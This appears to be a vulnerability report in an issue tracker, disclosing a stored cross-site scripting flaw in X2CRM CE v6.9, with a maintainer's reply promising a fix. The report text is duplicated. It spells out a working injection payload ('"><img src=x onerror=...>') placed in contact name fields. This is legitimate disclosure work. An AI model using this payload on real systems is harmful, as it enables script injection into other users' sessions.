Closed Fadavvi closed 1 year ago
Hi,
Description :
Create a contact with
first name: test"><img src=x onerror=prompt('@darknetguy');>
and last name : test2"><img src=x onerror=prompt('@darknetguy');>
( you can even delete the contact its worst!) XSS will run in to all pages than activity feed is present. ( in X2CRM CE V6.9)
Sample Pic:
Payload to use : "><img src=x onerror=prompt('@darknetguy');>
Tested on Windows 10 Firefox | Google Chrome // Cent-OS 7 Firefox | Chromium
BR,
Milad Fadavvi
We will have this XSS fixed in our next release. Thank you for the info! I will keep this issue open until confirmation that the vector has been removed.
Hi,
Description :
Create a contact with
first name: test"><img src=x onerror=prompt('@darknetguy');>
and last name : test2"><img src=x onerror=prompt('@darknetguy');>
( you can even delete the contact its worst!) XSS will run in to all pages than activity feed is present. ( in X2CRM CE V6.9)
Sample Pic:
Payload to use : "><img src=x onerror=prompt('@darknetguy');>
Tested on Windows 10 Firefox | Google Chrome // Cent-OS 7 Firefox | Chromium
BR,
Milad Fadavvi